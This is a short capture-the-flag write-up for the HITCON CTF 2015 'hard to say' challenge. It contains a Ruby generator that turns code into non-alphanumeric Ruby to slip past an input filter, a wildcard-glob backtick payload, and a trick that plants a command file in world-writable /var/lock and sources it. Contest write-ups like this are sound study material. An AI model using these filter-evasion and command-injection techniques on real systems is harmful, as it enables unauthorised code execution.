HITCON CTF 2015 hard to say

HITCON CTF 2015 hard to say

I used a generic ruby-to-symbolic-ruby converter (gen_hts.rb) to get
the first flag. I used m4 to get the second and third ones
(hts3.rb). As I couldn't come up with the use of $0, I played with the
first server for a while. I've realized /var/lock is world-writable,
so I created "/var/lock/!" whose content is "cat flag".

gen_hts.rb

#!/usr/bin/env ruby

# This program converts any Ruby program into a Ruby which does not
# have alpha numeric characters.

N = 5

c = '""'

File.read('hts_eval.rb').each_byte do |b|
  s = b.to_s(N)

  o = ''
  prev_add = nil
  s.each_char.each_with_index do |c, i|
    if i > 0
      if prev_add
        o = "(#{o})*__"
      else
        o = "#{o}*__"
      end
    end

    if prev_add = c.to_i > 0
      if o.empty?
        o += ['_'] * c.to_i * '+'
      else
        o += '+_' * c.to_i
      end
    end
  end

  c += "<<" + o
end

o = %q(_="#"=~/$/;__=_+_+_+_+_;->(&_){_[_,(_="#"=~/$/;__=_+_+_+_+_;"#{""<<(_+_+_+_)*__*__+_<<((_+_+_+_)*__+_+_+_)*__+_+_+_<<((_+_+_)*__+_+_+_+_)*__+_+_<<((_+_+_+_)*__+_)*__+_+_+_}"),(_="#"=~/$/;__=_+_+_+_+_;"#{TMPL}")]}[&:"#{""<<((_+_+_+_)*__+_+_+_)*__<<(_+_+_+_)*__*__+_<<((_+_+_+_)*__+_+_)*__<<(_+_+_+_)*__*__}"])
o = o.sub('TMPL',c)

STDERR.puts o.size

puts o

hts3.rb

_="#"=~/$/;`/???/*/?#{_+_+_+_} *`

hts4.rb

`. /*/*/!`